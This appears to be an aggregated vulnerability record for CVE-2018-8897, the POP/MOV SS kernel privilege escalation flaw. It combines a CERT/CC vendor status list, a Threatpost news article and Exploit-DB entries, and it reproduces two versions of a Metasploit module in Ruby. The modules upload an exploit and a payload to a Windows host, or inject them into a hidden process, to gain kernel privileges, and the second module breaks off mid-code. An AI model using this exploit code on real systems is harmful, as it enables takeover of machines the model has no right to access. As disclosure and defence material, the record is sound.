Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lantronix Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lenovo Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linksys Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Marvell Semiconductors Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MediaTek Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MetaSwitch Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Micro Focus Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microchip Technology Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MikroTik Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mitel Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NETSCOUT Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nominum Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OmniTI Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenConnect Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenDNS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation __ Unknown\n\nNotified: May 01, 2018 Updated: May 07, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOracle Solaris is not affected by `CVE-2018-8897`.\n\n### Peplink Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Philips Electronics Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PowerDNS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QLogic Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software Systems Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quantenna Communications Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ruckus Wireless Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SafeNet Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Mobile Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secure64 Software Corporation Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sierra Wireless Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-LINK Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TrueOS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubiquiti Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zebra Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### aep NETWORKS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### dnsmasq Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eCosCentric Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmp Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### pfSENSE Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 124 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P \nTemporal | 5.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.3 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://everdox.net/popss.pdf>\n * <http://cwe.mitre.org/data/definitions/703.html>\n\n### Acknowledgements\n\nMicrosoft and Intel credit Nick Peterson of [Everdox Tech, LLC](<https://www.linkedin.com/in/everdox>), for responsibly reporting this vulnerability and working with the group on coordinated disclosure. Andy Lutomirski is also credited for assistance in documenting the vulnerability for Linux.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-8897](<http://web.nvd.nist.gov/vuln/detail/CVE-2018-8897>) \n---|--- \n**Date Public:** | 2018-05-08 \n**Date First Published:** | 2018-05-08 \n**Date Last Updated: ** | 2019-07-11 16:31 UTC \n**Document Revision: ** | 107 \n", "modified": "2019-07-11T16:31:00", "published": "2018-05-08T00:00:00", "id": "VU:631579", "href": "https://www.kb.cert.org/vuls/id/631579", "type": "cert", "title": "Hardware debug exception documentation may result in unexpected behavior", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - POPMOV SS Privilege Escalation", "edition": 1, "published": "2018-05-22T00:00:00", "title": "Microsoft Windows - POPMOV SS Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EXPLOITPACK:F4489E070E6CDADA18DE546A030227F0", "href": "", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\n\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "Multiple operating system vendors issued coordinated patches this week to address a common vulnerability across their platforms, which was introduced thanks to widespread misinterpretation of Intel developer documentation.\n\nAccording to the CERT/CC team, [most major players](<https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=631579&SearchOrder=4>) (including Apple, FreeBSD, Microsoft, Red Hat, Ubuntu, VMWare and Xen, plus distros based on the Linux Kernel OS) built an uncannily similar privilege escalation flaw into their Intel-based products.\n\nThe flaw isn\u2019t remotely exploitable \u2013 a bad actor would need to gain local access to the victim\u2019s machine via malware or stolen credentials. But once in, CERT/CC explained that an attacker armed with OS APIs could access sensitive memory information, and also \u201ccontrol low-level OS functions\u201d by gaining elevated access privileges to the kernel level \u2013 i.e., hijack the code that controls the PC, Mac or VM.\n\nFrom there, Microsoft [explained](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), it\u2019s possible to install programs and malware; view, change or delete data; or create new accounts with full user rights.\n\nOn the more innocuous end of the threat-level spectrum, the issue can also simply crash the kernel by confusing the system, causing a denial-of-service state.\n\nOn the more technical front, the flaw ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)) resides in a debug exception in the x86-64 architectures. To be clear, the issue doesn\u2019t exist in the chip itself, but rather in the way developers have built their software stacks to interact with the processor.\n\nAs Red Hat explained, modern processors provide debugging infrastructure, used by system designers and application developers to debug their software and monitor events, including memory access (read or write), instruction execution and I/O port access.\n\n\u201cWhen such an event occurs during program execution, the processor raises a Debug Exception (#DB) to transfer execution control to debugging software,\u201d the company said in its [overview](<https://access.redhat.com/security/vulnerabilities/pop_ss>) of the flaw. \u201cThis catches the debug exception and allows a developer to examine program execution state.\u201d\n\nDevelopers appear to have widely misunderstood the way Intel processors handle that exception, leading to the same issue popping up across the computing landscape.\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d CERT/CC said.\n\nThe CERT/CC team explained the problem in an [advisory](<https://www.kb.cert.org/vuls/id/631579>): \u201cIn certain circumstances, after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.\u201d\n\nNick Peterson of Everdox Tech, who first uncovered the vulnerability, pointed the finger at what he said was Intel\u2019s lack of clarity in its instruction manual. In a [technical brief](<http://everdox.net/popss.pdf>), he noted, \u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation.\u201d\n\nWe reached out to Intel and received an official statement:\n\n_\u201cThe security of our customers and partners is important to us. __To help ensure clear communication with the developer community, we __are updating our [Software Developers Manual](<https://software.intel.com/en-us/articles/intel-sdm>)__ (SDM) with clarifying language on the secure use of the POP/MOV-SS instructions. We recommend that system software vendors evaluate their software to confirm their products handle the situations in question. More information is available [here](<https://www.kb.cert.org/vuls/id/631579>)__.\u201d_\n\nCreating secure computing environments obviously takes coordination between the chipmaker, software developers and vendors; however, there are always blind spots. In this case, once the chip is out the door, Intel has no visibility or control over how developers build software to use its silicon.\n", "modified": "2018-05-10T15:37:07", "published": "2018-05-10T15:37:07", "id": "THREATPOST:1C410BC5122B196A58BBDDCDA7A79983", "href": "https://threatpost.com/major-os-players-misinterpret-intel-docs-and-now-kernels-can-be-hijacked/131869/", "type": "threatpost", "title": "Major OS Players Misinterpret Intel Docs, and Now Kernels Can Be Hijacked", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-07-14T01:08:35", "description": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit). CVE-2018-8897. Local exploit for Windows platform. Tags: Metasploit Framework (MSF), L...", "published": "2018-07-13T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "EDB-ID:45024", "href": "https://www.exploit-db.com/exploits/45024/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can B\u00f6l\u00fck <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45024/"}, {"lastseen": "2018-05-24T14:24:06", "description": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation. CVE-2018-8897. Local exploit for Windows platform", "published": "2018-05-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EDB-ID:44697", "href": "https://www.exploit-db.com/exploits/44697/", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n\r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44697/"}], "metasploit": [{"lastseen": "2020-10-14T19:55:30", "description": "This module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kerneles, resulting in unexpected behavior for #DB excpetions that are deferred by MOV SS or POP SS. This module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.\n", "published": "2018-07-13T06:11:37", "type": "metasploit", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MOV_SS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\n 'Description' => %q(\n This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nick Peterson', # Original discovery (@nickeverdox)\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\n 'Can B\u00f6l\u00fck <can1357>', # PoC\n 'bwatters-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2018-05-08',\n 'References' =>\n [\n ['CVE', '2018-8897'],\n ['EDB', '44697'],\n ['BID', '104071'],\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n }\n ))\n\n register_options([\n OptBool.new('USE_INJECTION',\n [true, 'Use in-memory dll injection rather than exe file uploads.', true]),\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary if USE_INJECTION=false (%RAND% by default).', nil]),\n OptString.new('PAYLOAD_NAME',\n [false, 'The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write binaries if if USE_INJECTION=false(%TEMP% by default).', nil]),\n OptInt.new('EXECUTE_DELAY',\n [false, 'The number of seconds to delay before executing the exploit if USE_INJECTION=false', 3])\n ])\n end\n\n def setup_process\n begin\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def setup\n super\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\n @exploit_path = 